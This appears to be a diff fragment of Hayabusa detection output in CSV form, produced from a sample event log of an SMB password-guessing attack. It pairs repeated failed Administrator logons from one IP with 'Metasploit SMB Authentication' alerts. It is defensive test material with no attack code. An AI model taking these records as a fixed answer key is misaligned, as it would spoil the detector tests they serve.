+2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ztUyQpl8c9RoAr1j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jC23QAFM07q7cfVo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TSM8lmdOFoDslQNa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sGZaUGAT1oXmnGLB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZMNo21pTA67pb7Go  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EiTZCqK3m4icL1Vi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZaZ2mnoihX1Ec4di  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ihm9zaXkmWklXk4u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yLIZ3tlw9VlQmK28  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GVHzJHTi55NbxXYY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1FROeEnMLna2fTTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pio6ZZ9pV0pS2Whi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h1aD2w5U5K9ND5HV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zF8Jb4GpG4D3xn9i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Edv4GwGfL156V1xe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Irvneva9RFn44iII  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dHtJFI8OL9kJylL5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F5Q4h62T77hGjhKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdSALwo9td9xUeBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1kYfoqz1r1NuEn04  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7X400gufqdunUa8j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lLR8z7g0GY8r7a1r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QHMztrxiKBGtNqkp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7eBQevVhmZs5gHFD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lyQCs0PG6fGzpidu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnsPjnCieyoFIbJZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ku6mjVaG1lCJrAo1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VwiyVIWHOGuHzhdO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 92v1rXcj5c0Lt3OF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yO2JYd6FfM2Y7px9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ltr5g8ZWUAdrPKxg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fjiPMy5uOTbbmaQ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HDRVOzxca9wDJziV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DV28RjUK26Je2Dr9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seoetT43w0S3FEss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IdIU9Q9Ig4Bd3Aps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGzuHSHT59Qnp5jI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wPA1J7aQrZ064WSf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhLFXDMUKGfdoc4S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: apVAhc6o3dhLmUll  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FYMdQeB4ZpFm8xDh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QewW1ISqRdXwtSXA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SFhBcgZfc9VZ5S8S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a4ZSRW7F65yDNbJd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HrbzGNYIbjErVtDR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eFcGaL3asLVIF08d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
